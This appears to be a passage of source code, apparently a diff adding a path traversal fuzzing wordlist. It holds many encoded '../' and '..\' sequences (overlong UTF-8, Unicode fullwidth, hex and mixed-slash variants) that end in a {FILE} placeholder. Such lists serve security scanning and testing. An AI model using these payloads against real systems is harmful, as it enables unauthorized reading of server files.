"true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,..0x2f{FILE}", + "true,..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,..0x5c{FILE}", + "true,..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,///%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,\\\\\\%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..//{FILE}", + "true,..//..//{FILE}", + "true,..//..//..//{FILE}", + "true,..//..//..//..//{FILE}", + "true,..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//..//{FILE}", + "true,..///{FILE}", + "true,..///..///{FILE}", + "true,..///..///..///{FILE}", + "true,..///..///..///..///{FILE}", + "true,..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///..///{FILE}", + "true,..\\\\{FILE}", + "true,..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,./\\/./{FILE}", + "true,./\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,./../{FILE}", + "true,./.././../{FILE}", + "true,./.././.././../{FILE}", + "true,./.././.././.././../{FILE}", + "true,./.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././.././../{FILE}", + "true,.\\..\\{FILE}", + "true,.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.//..//{FILE}", + "true,.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,../{FILE}", + "true,../..//{FILE}", + "true,../..//../{FILE}", + "true,../..//../..//{FILE}", + "true,../..//../..//../{FILE}", + "true,../..//../..//../..//{FILE}", + "true,../..//../..//../..//../{FILE}", + "true,../..//../..//../..//../..//{FILE}", + "true,..\\{FILE}", + "true,..\\..\\\\{FILE}", + "true,..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..///{FILE}", + "true,../..///{FILE}", + "true,../..//..///{FILE}", + "true,../..//../..///{FILE}", + "true,../..//../..//..///{FILE}", + "true,../..//../..//../..///{FILE}", + "true,../..//../..//../..//..///{FILE}", + 